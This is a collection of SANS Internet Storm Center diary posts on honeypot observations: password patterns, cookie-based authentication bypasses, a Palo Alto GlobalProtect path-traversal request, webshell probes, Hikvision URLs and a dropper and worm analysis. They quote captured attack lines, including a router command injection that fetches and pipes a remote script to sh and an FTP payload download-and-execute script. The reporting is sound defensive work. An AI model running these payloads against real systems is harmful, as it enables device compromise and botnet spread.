Tag Archives: Security

[Guest Diary] Comparing Honeypot Passwords with HIBP, (Wed, Oct 1st)

This post was originally published on this site

[This is a Guest Diary by Draden Barwick, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

DShield Honeypots are constantly exposed to the internet and inundated with exploit traffic, login attempts, and other malicious activity. Analyzing the logged password attempts can help identify what attackers are targeting. To go through these passwords, I have created a tool that leverages HaveIBeenPwned’s (HIBP’s) API to flag passwords that haven’t appeared in any breaches.

Purpose

Identifying passwords that haven’t been seen in known breaches is useful because it can indicate additional planning and help identify patterns in these less common passwords. Anyone that operates a honeypot (and receives a lot of data on attempted use of passwords in plaintext) could benefit from this project as an additional starting point for investigations.

Development

HaveIBeenPwned maintains a large database of breached passwords and offers an API to tell if a given password has been compromised. This is done by making a request to “https://api.pwnedpasswords.com/range/#####”. Where the “#####” part in a request is the first 5 characters (prefix) of the SHA1 hash of the tested password. The site will return a list of the last 35 characters (suffix) for any password hash in the database that starts with the provided prefix. Each entry includes a count of how many times the corresponding password has been seen in breaches. This prevents anyone from knowing the full hash of the password we are looking for based on the request alone. While this consideration is not important for our use with the DShield honeypots (as all passwords seen are publicly uploaded), it is important to understand because HIBP does not allow for searching with the full hash directly [2].

To gather a list of all passwords my honeypot has gathered, I used JQ to parse the cowrie.json files located in the /srv/cowrie/var/log/cowrie directory. This command matches on any login failures or successes, and returns the password field from matching entries:

jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* 

To extend this, we can remove duplicates using sort and uniq and save the unique passwords to a file:

jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* | sort | uniq > ~/uniquepass.txt

As of writing, this took the number of passwords from 51,601 to 16,210 unique passwords.

Now that we have a list of unique passwords, the next steps are to: read the created password file, take the SHA1 hash of each line, query the API for the hash prefix, and check for the hash suffix in the results.

To accomplish this, I created a Python script that utilizes one input file and two output files. The input file has a list of passwords to check with one entry per line. One output file stores all passwords that have been checked, the SHA1 hash, and how many times HIBP has seen the password (this file is a CSV used to avoid checking a password in the input file if it has been checked before). The other output file stores the plaintext of any password never seen by HIBP. The command line usage looks like this:

python3 queryHIBP.py uniquepass.txt passwordResults.csv unseenPasswords.txt

This resulted in the identification of 1,196 passwords that HIBP has not seen.

Code Breakdown

The code, available on GitHub [3], has thorough commenting but we will examine some parts here to gain a deeper understanding of how it functions.

In Figure 1, we can see the section of code that handles reading the results file that includes all passwords we have searched for. This is expected to be formatted as a CSV file with a header of “password,sha1,count”. As explained above, this helps avoid checking passwords unnecessarily.

The code opens the file with csv.DictReader, checks for “password” in the header, then uses a for loop to go through all of the rows to pull non-empty passwords and add them to a set. The set is returned at the end of the function.

 
Figure 1: Code used to read all previously checked passwords.

 

In Figure 2, we can see the code used to make API requests and handle a common error. First, a loop is established and the API request is made. Second, we check for a 429 response code which means there were too many requests. If there was a 429 error, HIBP will add a “Retry-After” header which lets us know how long to wait before trying again. The user agent is specified elsewhere as “PasswordCheckingProject” because HIBP states that “A missing user agent will result in an HTTP 403 response” [4].


Figure 2: Code used to make API requests and handle expected 429 errors.

 

Figure 3 shows the behavior for handling additional errors and normal function. Firstly, “resp.raise_for_status” is called which would raise an exception if there were an error with the HTTP request. If there’s no error, we simply iterate through all lines of the response to save the hash suffix and count in a dictionary, then return it. If an exception is raised, we increment an “attempt” variable which lets us cap the number of retries which is set to three by default. If the max is hit here, the code will print an error message indicating what prefix was being checked and exit. If there are more retries remaining, the script will wait 5 seconds before continuing. Figure 2 has a similar check for max retries to avoid a potential infinite loop of 429 errors.


Figure 3: Code used to store & return request results or deal with continued/unexpected errors.

 

Implementation

To download the project and try it out with some test data, one can run the following:

git clone https://github.com/MeepStryker/queryHIBP.git
cd queryHIBP
python3 queryHIBP.py ./sampleInput.txt ./passwordResults.csv ./unseenPasswords.txt

As the script runs, it will print out each unseen password identified and a short summary at the end as seen in Figure 4.


Figure 4: Script output using real data.

 

Automation

To automate the use of this tool, I created a cron job to run the JQ command & output results to a file and made another job to run the script with the needed arguments. These are set to run daily with the script running 5 minutes after the JQ command. This uses the following crontab entries:

0 17 * * * jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* | sort | uniq > ~/uniquepass.txt

5 17 * * * python3 ~/queryHIBP.py ~/uniquepass.txt ~/passwordResults.csv ~/unseenPasswords.txt

The script runs 5 minutes after the JQ command to ensure there is more than enough time to create the input file. Since there is a limit on how long logs are retained, there are no concerns about this ever starting to take longer.

I chose this method over adding parsing functionality into the script out of convenience. Using the script would require additional logic and either hardcoding locations to check for logs or dealing with more arguments. As it is designed, anyone can easily plugin a list of passwords without having to worry about many command line options or editing the script.

Results

The script accurately provides information on passwords that HaveIBeenPwned has not seen in prior breaches. While there were more unseen passwords than one may expect (1,196 or ~7.4% of all unique passwords as of writing), it provides interesting insight into what some actors may be targeting. The results also reveal patterns for password mutations that are being leveraged for access attempts:

deploy12345
deploy123456
deploy1234567
deploy12345678
deploy@2022
deploy@2023
deploy@2025
deploy2025
deploy@321
deploypass
P@$$vords123
P@$sw0rd#
P4$$word!@#
P455wORd
P@55W0RD2004
Pa$$word2016!
pa33w0rd!@
Pa55w0rd@2021
passw0rd!@#$
pass@w0rd.12345
passwd@123!
PaSswORD@123
password@2!@
PaSswORd2021
password!2024
password!2025
Password43213
password!@#456

Password Patterns & Analysis

Analyzing the passwords seen in the above Results section can provide some insight into what techniques are being used to generate passwords.

Consider the above sample of results. Broadly speaking, this ‘deploy family’ of passwords was likely generated by starting with a base password of “deploy” and adding common modifiers to increase complexity. Seen here are good examples of the most simple ones: adding the year (with an @ sign in this case) and adding sequential numbers.

The rest of the entries above are all based on the word ‘password’. These are more complex than what we saw with ‘deploy’. Below are three entries, a plain explanation of a Hashcat rule that could be used to come up with it, and a sample implementation of the rule:

  • P4$$word!@#
    • Capitalize the first letter, replace a’s with 4’s, replace s’s with $’s, add !@# to end – c sa4 ss$ $! $@ $#
  • P@55W0RD2004
    • Capitalize all letters, replace a’s with @’s, replace s’s with 5’s, replace o’s with 0’s, and add a year to the end – u sa@ ss5 so0 $2 $0 $0 $4
  • Password!2024
    • Capitalize the first letter, add ! and a year to the end – t0 $! $2 $0 $2 $4

Both Hashcat and John the Ripper can make these modifications by using rules to augment password lists. The rules allow various changes to input such as replacing or swapping certain characters with others. Note that while much of the rules syntax between these tools is similar, there are some differences [5].

Looking through the unseen passwords, we can also see more specific targets such as Elasticsearch, Oracle, PostgresSQL, and Ubuntu. Figure 5 shows some of these passwords, which use the same kind of modifications mentioned earlier, and illustrate the relative difference in frequency.


Figure 5: Passwords related to specific services/platforms.

Overall Takeaway

While a good amount of manual analysis will still be required, these results can provide a lot of value and the script helps cut down on time. We can learn more about common password modifications to avoid and even get an idea of the relative interest of different targets. In Figure 5 alone, we can see that PostgresSQL may be roughly two times more likely to be targeted than Elasticsearch with newer installations being targeted in particular.

For future work, I would add a feature to recheck the known unseen passwords to identify if they happen to be newly breached.

Additionally, I may consider adding two features for convenience. The first would be re-sorting the unseen file since it is append only. The second would be parsing features to simplify automation and allow the script to provide more functionality for end users.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://haveibeenpwned.com/API/v3#PwnedPasswords
[3] https://github.com/MeepStryker/queryHIBP
[4] https://haveibeenpwned.com/API/v3#UserAgent
[5] https://hashcat.net/wiki/doku.php?id=rule_based_attack#compatibility_with_other_rule_engines

 


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

"user=admin". Sometimes you don't even need to log in., (Tue, Sep 30th)

This post was originally published on this site

One of the common infosec jokes is that sometimes, you do not need to "break" an application, but you have to log in. This is often the case for weak default passwords, which are common in IoT devices. However, an even easier method is to tell the application who you are. This does not even require a password! One of the sad recurring vulnerabilities is an HTTP cookie that contains the user's username or userid.

I took a quick look at our honeypot for cookies matching this pattern. Here is a selection:

Cookie: uid=1
Cookie: user=admin
Cookie: O3V2.0_user=admin
Cookie: admin_id=1; gw_admin_ticket=1
Cookie: RAS_Admin_UserInfo_UserName=admin
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.
Cookie: admin_id=1; gw_admin_ticket=1;
Cookie: ASP.NET_SessionId=; sid=admin

These are listed by frequency, with "uid=1" being the most commonly used value.

Let's see if we can identify some of the targeted vulnerabilities.

For the first one (uid=1), the URL hit is:

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<some shell command>

%%CVE:2024-3w721%%: This is a relatively new (2024) OS command injection vulnerability in certain TBK DVRs. 

The second one is also an IoT-style issue:

POST /goform/set_LimitClient_cfg
User-Agent: Mozilla/5.0 (makenoise@tutanota.de)
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Cookie: user=admin

time1=00:00-00:00&time2=00:00-00:00&mac=%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.xqe.sh%7Csh%26echo%20

%%CVE:2023-26801%%: Another "classic" IoT issue. This one affects LB-LINK wireless routers. This vulnerability may never have been patched, but I'm unsure how popular these routers are.

The cookie "O3V2.0_user=admin" is associated with a similar, but more recent issue affecting Tenda O3V2 wireless access points. Wireless internet service providers (WISPs) often use these outdoor access points. The vulnerability is similar to the issue above in that a POST request to "/goform/setPingInfo" is used to carry an OS injection payload—the common URL schemes like "/goform" point to similar firmware and likely similar vulnerabilities.

" admin_id=1; gw_admin_ticket=1": Google returned a reference to a post in Chinese, implying that this is a vulnerability in "Qi'anxin VPN" and allows arbitrary account and password modification.

"RAS_Admin_UserInfo_UserName=admin" affects the "Comai RAS System" software for managing remote desktop environments. Most references to the vulnerability are in Chinese. I did not see a CVE number, but the vulnerability appears to be three years old.

"CMX_SAVED_ID=zero; CMX_ADMIN_ID=science": No CVE, and there is no fix for this issue, which was discovered in 2021. Only affects a biometric access system 🙁 (COMMAX. See https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php.

So in short: Yes… These vulnerabilities are out there, and they are exploited.


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Apple Patches Single Vulnerability CVE-2025-43400, (Mon, Sep 29th)

This post was originally published on this site

It is typical for Apple to release a ".0.1" update soon after releasing a major new operating system. These updates typically fix various functional issues, but this time, they also fix a security vulnerability. The security vulnerability not only affects the "26" releases of iOS and macOS, but also older versions. Apple released fixes for iOS 18 and 26, as well as for macOS back to Sonoma (14). Apple also released updates for WatchOS and tvOS, but these updates do not address any security issues. For visionOS, updates were only released for visionOS 26.

Increase in Scans for Palo Alto Global Protect Vulnerability (CVE-2024-3400), (Mon, Sep 29th)

This post was originally published on this site

We are all aware of the abysmal state of security appliances, no matter their price tag. Ever so often, we see an increase in attacks against some of these vulnerabilities, trying to mop up systems missed in earlier exploit waves. Currently, on source in particular, %%ip:141.98.82.26%% is looking to exploit systems vulnerable to CVE-2024-3400. The exploit is rather straightforward. Palo Alto never considered it necessary to validate the session id. Instead, they use the session ID "as is" to create a session file. The exploit is well explained by watchTowr [1].

First, we see a request to upload a file:

POST /ssl-vpn/hipreport.esp
Host: [honeypot ip]:8080
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Content-Length: 174
Content-Type: application/x-www-form-urlencoded
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/33EGKkp7zRbFyf06zCV4mzq1vDK.txt;
Accept-Encoding: gzip

user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global

Next, a request to retrieve the uploaded file:

GET /global-protect/portal/images/33KFpJLBHsMmkNuxs7pqpGOIIgF.txt
host: [honeypot ip]
user-agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
connection: close
accept-encoding: gzip

This will return a "403" error if the file exists, and a "404" error if the upload failed. It will not execute code. The content of the file is a standard Global Protect session file, and will not execute. A follow-up attack would upload the file to a location that leads to code execution. 

The same source is also hitting the URL "/Synchronization" on our honeypots. Google AI associates this with a Global Protect vulnerability discovered last week, but this appears to be a hallucination.  

[1] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New tool: convert-ts-bash-history.py, (Fri, Sep 26th)

This post was originally published on this site

In SANS FOR577[1], we talk about timelines on day 5, both filesystem and super-timelines. but sometimes, I want something quick and dirty and rather than fire up plaso, just to create a timeline of .bash_history data, it is nice to just be able to parse them and, if timestamps are enabled, see them in a human-readable form. I've had some students in class write scripts to do this and even had one promise to share it with me after class, but I never ended up getting it so I decided to write my own. This script takes the path to 1 or more .bash_history files and returns a PSV (pipe separated values) list (on stdout) in the form: <filename>|<datetime>|<command> where the <datetime> is in ISO-8601 format (the one true date time format, but only to 1 sec resolution since that his the best that the .bash_history file will give us). In a future version I will probably offer an option to change from PSV to CSV. 

Webshells Hiding in .well-known Places, (Thu, Sep 25th)

This post was originally published on this site

Ever so often, I see requests for files in .well-known recorded by our honeypots. As an example:

GET /.well-known/xin1.php?p
Host: [honeypot host name]

The file names indicate that they are likely looking for webshells. In my opinion, the reason they are looking in .well-known is that this makes a decent place to hide webshells without having them overwritten by an update to the site.

The .well-known directory is meant to be used for various informational files [1], and for example, for ACME TLS challenges. As a result, it is the only directory or file starting with "." that must be accessible via the web server. But it is also "hidden" to Unix command line users. I have written about the various legitimate users of .well-known before [2]. 

We also see some requests for PHP files in the acme-challenge subdirectory, as well as the pki-challenge subdirectory:

Here are some of the more common, but not "standard" URLs in .well-known hit in our honeypots:

/.well-known/pki-validation/about.php
/.well-known/about.php
/.well-known/acme-challenge/cloud.php
/.well-known/acme-challenge/about.php
/.well-known/pki-validation/xmrlpc.php
/.well-known/acme-challenge/index.php

 

 

[1] https://datatracker.ietf.org/doc/html/rfc8615
[2] https://isc.sans.edu/diary/26564

 —
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|image of an http request to .well-known/xin1.php?p

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Exploit Attempts Against Older Hikvision Camera Vulnerability, (Wed, Sep 24th)

This post was originally published on this site

I notice a new URL showing up in our web honeypot logs, which looked a bit interesting:

/System/deviceInfo?auth=YWRtaW46MTEK

The full request:image of the http request explained on the site.

GET /System/deviceInfo?auth=YWRtaW46MTEK
Host: 3.87.70.24
User-Agent: python-requests/2.32.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The "auth" string caught my attention, in particular as it was followed by a base64 encoded string. The string decodes to admin:11.

This "auth" string has been around for a while for a number of Hikvision-related URLs. Until this week, the particular URL never hit our threshold to be included in our reports. So far, the "configurationFile" URL has been the most popular. It may give access to additional sensitive information.

 

Earliest Report Most Recent Report Total Number of Reports URL
2018-08-18 2025-09-23 6720 /System/configurationFile?auth=YWRtaW46MTEK
2017-12-14 2025-09-23 2293 /Security/users?auth=YWRtaW46MTEK
2021-03-09 2025-09-23 2002 /system/deviceInfo?auth=YWRtaW46MTEK
2020-09-25 2023-02-04 727 /security/users/1?auth=YWRtaW46MTEK
2018-09-09 2025-09-23 445 /onvif-http/snapshot?auth=YWRtaW46MTEK
2017-10-06 2017-10-06 6 /Streaming/channels/1/picture/?auth=YWRtaW46MTEKYOBA
2025-04-09 2025-04-29 2 /ISAPI/Security/users?auth=YWRtaW46MTEK

 

Some Googleing leads to CVE-2017-7921 [1]. Hikvision's advisory is sparse and does not identify a particular vulnerable URL [2]. But this looks to me more like some brute forcing. The CVE-2017-7921 vulnerability is supposed to be some kind of backdoor (Hikvision's description of it as "privilege escalation" was considered euphemistic at the time). But I doubt the password is "11", and a typical Hikvision default password is much more complex ("123456" in the past).

We have written about Hikvision many times before; its cameras, as well as cameras from competitors like Dahua, are well known for their numerous security vulnerabilities, hard-coded "support passwords", and other issues. One issue with many of these cameras has been a limited user interface. The DVR used to collect footage from these cameras often only includes a mouse and an onscreen keyboard, making it difficult to select reasonable passwords. This attack may count on users setting a simple password like "11" as by default, only a numeric onscreen keyboard is displayed on some models.

Another issue is the use of credentials on the URL, which is discouraged as they tend to leak easily in logs. But it may be yet again a convenience decision as you are able to create hyperlinks that will log you in automatically.

 

[1] https://nvd.nist.gov/vuln/detail/cve-2017-7921
[2] https://www.hikvision.com/us-en/support/document-center/special-notices/privilege-escalating-vulnerability-in-certain-hikvision-ip-cameras/
 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Exploring Uploads in a Dshield Honeypot Environment [Guest Diary], (Thu, Sep 18th)

This post was originally published on this site

[This is a Guest Diary by Nathan Smisson, an ISC intern as part of the SANS.edu BACS program]

The goal of this project is to test the suitability of various data entry points within the dshield ecosystem to determine which metrics are likely to yield consistently interesting results.  This article explores analysis of files uploaded to the cowrie honeypot server.  Throughout this project, a number of tools have been developed to aid in improving workflow efficiency for analysts conducting research using a cowrie honeypot.  Here, a relatively simple tool called upload-stats is used to enumerate basic information about the files in the default cowrie ‘downloads’ directory at /srv/cowrie/var/lib/cowrie/downloads.  This and other tools developed in this project are available for use or contribution at https://github.com/neurohypophysis/dshield-tooling.

The configuration of my honeypot is intentionally very typical, closely following the installation and setup guide on https://github.com/DShield-ISC/dshield/tree/main.  The node in use for the purposes of this article is was set up on an EC2 instance in the AWS us-east-1 zone, which is old and very large, even by AWS standards.

Part 1: Identified Shell Script Investigation

The upload-stats tool works by enumerating some basic information about the files present in the downloads directory and printing it along with any corresponding information discovered in the honeypot event logs.  If the logs are still present on the system, it will automatically identify information such as source IP, time of upload, and other statistics that can aid in further exploration of interesting-looking files.
Given no arguments, the tool produces a quick summary of the files available on the system:

In this case, 21 of the files are reported as empty; if you’re following along, you may notice that the names of many such empty files are something short like tmp5wtvcehx.  When an upload is started, cowrie creates a temporary file, populates it with the contents of the uploaded file, and then renames it to the SHA hash of the result.  For empty files with temporary placeholder names, that likely means that the upload failed for some reason.

Among the top file types provided, we have a single file that was identified by the UNIX file utility as a Bash script.  As it turns out, this was not the only shell script among the files present in the directory at the time this command was run.  The reason that only one of them was identified as a shell script will be explored later in this article.  First, let’s take a look at the outlier.  Luckily it’s relatively short, so I can include the contents of the entire script here.

Fortunately for us, this script is very repetitive and easy to read, so let’s go line by line for one iteration of the pattern (which, I might add, could be much more concise had the actor used a for loop).

Line 1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;

Each line of the script begins by attempting to change to several directories (cd /tmp || cd /var/run || cd /mnt || cd /root || cd /). This fallback sequence suggests a preference for a writable, low-monitoring location first (/tmp) and will attempt alternative directories only if prior ones fail, with the file root as a last resort.

Line 2
ftpget -v -u anonymous -p anonymous -P 21 87.121.84.163 arm5 arm5;

What follows is a command to download an architecture-specific payload from the actor’s FTP server.  More specifically, the script as a whole, if executed (and assuming we have ftpget installed, which we do not) will download payloads for 14 different architectures, casting a pretty wide net.  The inclusion of the -v (verbose) switch indicates that the actor expects, or at least hopes for non-blind RCE in this context, though we can assume FTP server accesses from the victim would be visible to the actor if execution succeeded, regardless.

To be thorough, here are the targeted CPU architecture variants:
•    mips, mipsel (MIPS variants)
•    sh4 (SuperH architecture)
•    x86_64 (64-bit Intel/AMD)
•    arm6, arm, arm5, arm7 (various ARM versions)
•    i686, x86 (32-bit Intel/AMD)
•    powerpc, ppc4fp (PowerPC variants)
•    m68k (Motorola 68k series)
•    spc (Ambiguous; may refer to SPC-700, among others.  I’d have to ask the author of the malware for clarification)

An interesting list, to be sure.  After researching some of the more obscure variants, the underlying commonality seems to be targeting IoT/embedded/OT devices or (likely legacy) networking equipment.  It’s hard to say anything beyond that for certain, though many of these have much more limited applications than others (e.g., SuperH, Motorola 68000 series, and SPC vs x86_64).  Notably absent are any Apple chips or many of the modern chips used in Android handsets.  Given the types of devices used with some of these specialized hardware sets, the final payload is unlikely to attempt anything involving a heavy workload.
I also noted the use of the old plaintext FTP for payload transfer: old becomes new again.

Line 3
chmod 777 arm5 ./arm5 telnet

This step changes the permissions of the downloaded payload to executable and then executes it with the argument ‘telnet’, which I’m guessing indicates the intended backdoor method.  Note that the script as received will attempt to execute all of the downloaded payloads, meaning that any environment discovery likely happens at this step, and only the payload corresponding to the compromised host’s chip architecture will successfully execute.

Line 4
rm -rf arm5

Finally, the payload is removed, possibly indicating that a persistence mechanism has been installed with the previous step, and more obviously indicating a desire to leave slightly fewer forensic artifacts on the target system.

Second-Stage Payload Server Analysis

The address 87.121.84.163 did not appear in any of the other uploaded files.  It appeared in several IP reputation blocklists as reported by Speedguide and Talos, though the referenced database at spamhaus.org did not return any immediately visible results.  At any rate, the RIPE records have the /24 netblock registered to an AS owned by a Dutch VPS provider, VPSVAULTHOST, which looks like it’s operating in the UK.  I’m assuming it’s a cloud-hosted server.  Interestingly, the ISC page has the country listed as Bulgaria, though I didn’t see anything else pointing there in my search.  Nothing else is reported on the ISC website.

Unfortunately, I have no other records of the source of this attack directly.  87.121.84.163 also did not appear in any other records, which is expected considering its role in the attack as a payload server.  In the next section, we will see instances of honeypot uploads with associated log entries, allowing for a more complete picture of an attack origin and life cycle.

Part 2: Botnet Worm Discovery

Continuing the investigation of patterns in uploaded files, I noticed that all of the file types identified by the system as ‘data’ appear to be readable text.  In the earlier bash script analysis, I noted that the file in question was not the only shell script present.  That is, it was not the only file containing a shebang (!#/bin/bash).  Moreover, file permissions that may have permitted identification of a shell script as such (i.e., 644 – readable by users other than root) were not unique to this file.  In fact, all of the ‘data’ files were not only readable but also consistently contained the string ‘bin/bash’.  In the following command, I filter for file types matching ‘data’ and containing ‘bin/bash’:


Note: Many of the files have no corresponding ‘metadata’ because the log records associated with these files have aged off of the system, but the files themselves have not.  Also, there are more total files in this screenshot because the timeline of this investigation was not perfectly linear.

In the previous screenshot we saw that our query for data files containing the bash interpreter path returned six matches.  Re-running the tool with no arguments, it appears that these six files account for 100% of our files of type ‘data’.  Looking at the other file types, the readability was either self-explanatory (ASCII, Unicode, shell script, empty) or inconsistent (some ‘regular files’ were binary while others were text-based).

The reason behind the variance in assigned permissions (either 0600 or 0644 for all files in the directory) has to do with the source of the activity from cowrie’s perspective.  A look at cowrie’s VFS (virtual file system) templates in fs.pickle would likely reveal the specifics of how these permissions are assigned, but for our purposes that’s not necessary at the moment.  To gain a general sense for the provenance of different file types on the system, we can start by examining the behavioral patterns associated with IPs that uploaded files of different types.  To set a baseline, I used another tool, ip-activity, to aggregate all of the log events associated with addresses that uploaded ‘regular’ files.  

Luckily not all of the logs related to these files have yet aged off.  This collection of data should reveal any consistencies in the context behind how these files were uploaded, which indeed it does.  For all files labeled as ‘regular’, the actor makes several login attempts, succeeds, and then uploads a file via SFTP.  With that knowledge, activity patterns related to ‘data’ files should stand out.

As hoped, this pattern is also consistent: for files marked ‘data’, the source came from stdin during an active SSH session.  That is, for these files the actor interacted with the system during an authenticated session before and/or after pushing a payload onto it, for 81.172.146.181 and 176.188.22.163 at the very least.  Once verified, this type of information will be useful to include in the output for later editions of the upload-stats tool.

While looking over the activity for these two addresses, the login attempts caught my eye.  Both clients attempted pi/raspberry and pi/raspberryraspberry993311.  Obviously enough they’re both looking for RBP devices in this case, but raspberryraspberry993311 is a rather specific guess, considering that it was the second of only two guesses from two (to our current knowledge) independent hosts.  To me, that indicates this password is probably not a random guess from a brute-forcing attempt.

A bit of research into ‘raspberryraspberry993311’ revealed a specific botnet malware strain associated with Pi IoT devices identified as UNIX_PIMINE.A by Trend Micro.  The 2019 article linked below features a through analysis of the malware that I will compare with the activity captured on my device.

https://www.researchgate.net/profile/Joakim-Kargaard-2/publication/334704944_Raspberry_Pi_Malware_An_Analysis_of_Cyberattacks_Towards_IoT_Devices/links/5e6f86ea458515e555803389/Raspberry-Pi-Malware-An-Analysis-of-Cyberattacks-Towards-IoT-Devices.pdf

To start, let’s compare the commands that followed successful authentication to the honeypot.  From my output, each command was saved to a separate tty logfile, so unfortunately the venerable playlog.py is not especially useful in this case.  However, we can still extract the command events directly from the logs, which I did.  For those not aware, playlog.py is a tool created by Upi Tamminen (desaster@dragonlight.fi) that parses cowrie TTY logs (saved in /srv/cowrie/var/lib/cowrie/tty/) and allows analysts to replay the activity in real time.

Both of our actors immediately pull a file to /tmp using scp, then set its permissions to executable and run it.  So far this is exactly aligned with the activity described in the UNIX_PIMINE.A article.  Next I will examine the files uploaded to see if they also follow the same path, where they may differ, and whether they appear to be members of the same botnet channel.


Screenshot from the researchgate.net article referenced above

Static Malware Analysis:  UNIX_PIMINE.A

Comparing the two samples uploaded by 81.172.146.181 and 176.188.22.163, the only difference between them is an scp control message prepended to the top of the files: C0755 4745 ocM8dVVu and C0755 4745 komDY9Nv, respectively.  To take the latter example, this control message breaks out to ‘copy file komDY9Nv of size 4745 with permissions 0755.’  As a side, the presence of control messages at the top of the files uploaded from stdin likely explains why the ‘data’ files are not marked as shell scripts.  In addition, a null byte at the end of the files may explain why they are classified as ‘data’ rather than ASCII text.

Before continuing analysis of the scripts associated with just these two addresses, you may have noticed in the earlier enumeration of ‘data’ files that the sizes of the remaining files for which we lack log data appear to be identical.  Running vimdiff against the remaining files confirms that our other 4 data file records are instances of attacks from members of the same botnet.  Continuing down the code, everything appears to align with the description given in the referenced article.  The malware makes a copy of itself to a file with a random 8-digit name within /opt, modifies /etc/local.rc to execute the backdoor on reboot, and then instructs the system to do just that.

After that, the malware attempts to kill and remove a number of other (apparent) cryptomining plants that may already exist on the compromised system, before connecting out to an Undernet Internet Relay Chat (IRC) channel on port 6667, where it joins the #biret C2 channel with an username based on the md5 hash of the compromised system’s uname output.  As pointed out in the article, this is a fairly low-entropy generation scheme for unique usernames, since the probability of multiple systems with identical output for ‘uname -a’ is very high, leading to username collisions and ultimately limiting the worm’s growth factor.  I suspected channel rotation might have occurred since the article was published, but the instances that hit my machine were in fact from members of the same botnet from 2019.  Malware that endlessly replicates itself independently of its originator, as it turns out, is pretty hard to patch.

The worm’s spreading mechanism involves the installation of sshpass for simplifying ssh-based connections to new targets and Zmap for port scanning.  Specifically, it scans IPs (iterating 100,000 addresses at a time) for port 22 availability and stores reachable addresses in a temporary file before trying its 2 credential sets: pi/raspberry and pi/raspberryraspberry993311.  The password ‘raspberry’ is a long-running default for Pi devices.  However, at this point it’s still not entirely clear why this second combination is used in particular; it is strongly correlated with various pi-related attacks, but does not seem to be a common default password as far as I have been able to discover.  It’s possible that some other malware variants (such as those this worm attempts to remove) create an account on compromised hosts with these credentials, leading to an increased likelihood of successful authentication for the types of devices this worm looks to infect.

Source Address Consideration: Compromised Pies

Knowing what we do about the way this malware spreads, the session activity is pretty clear.  It’s best to think of the actor addresses in this case as two compromised victims of the same worm; i.e., members of the same botnet.  From the two sets of logs we have at hand, 81.172.146.181 appears to be a Dutch ISP-assigned public address within a network belonging to DELTA Fiber Nederland B.V.  My guess would be that this is a network/IoT appliance or possibly an RBP positioned behind a SOHO gateway router with port forwarding, based on what we’ve seen so far.  176.188.22.163 is a similar story: in this case, belonging to a French ISP (Bouygues Telecom).  No malicious activity has been reported for either address on the ISC website.

Conclusion: File Uploads and Attack Descriptions

Correlation of event logs to files uploaded to the honeypot has proved effective for discovering highly specific attack patterns.  Moreover, context surrounding the operating internals of the cowrie (or other honeypot) environment is crucial for understanding the chronology and substance of an event.  Automating processes such as event correlation and the ability to group files, IPs, and other information into discrete buckets greatly reduces the overhead required for such investigations and encourages analytic insights.  A disadvantage to this approach is that the scope of activity relative to the volume of events not logged in file uploads is very small, though depending on the intent of an investigation, this may not be a problem.

The attacks observed in this article highlight the need primarily for maintenance and monitoring of legacy systems, as well as the necessity of changing default passwords before exposing systems to the public Internet.

[1] https://github.com/neurohypophysis/dshield-tooling
[2] https://github.com/DShield-ISC/dshield/tree/main
[3] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.